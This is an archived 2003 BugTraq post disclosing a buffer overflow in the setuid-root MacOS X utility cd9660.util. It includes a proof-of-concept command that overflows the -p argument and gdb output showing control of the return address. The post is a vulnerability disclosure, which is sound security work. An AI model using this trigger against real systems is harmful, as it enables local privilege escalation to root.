BugTraq
Buffer overflow/privilege escalation in MacOS X Dec 15 2003 07:54PM
Max (rusmir tula net) (1 replies)
Hi,

It appears that parts of MacOSX that didn't come from BSD are
not very well written and have significant security issues.

An example is a /System/Library/Filesystems/cd9660.fs/cd9660.util
utility. It is suid root and it is vulnerable to a classic buffer
overflow due to the lack of input validation.

Demonstration:

sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util
-rwsr-xr-x 1 root wheel 20476 23 Sep 23:53 cd9660.util

sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e "print 'A'x512"`
Segmentation fault

sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 ./cd9660.util
[gdb banner here]
Reading symbols for shared libraries .... done
Core was generated by `./cd9660.util'.
#0 0x9000d360 in strcat ()
(gdb) where
#0 0x9000d360 in strcat ()
#1 0x00002b84 in main ()
#2 0x41414141 in ?? ()

Thanks,

Max.

[ reply ]
Re: Buffer overflow/privilege escalation in MacOS X Dec 18 2003 03:37PM
David Riley (oscar the-rileys net)


 

Privacy Statement
Copyright 2010, SecurityFocus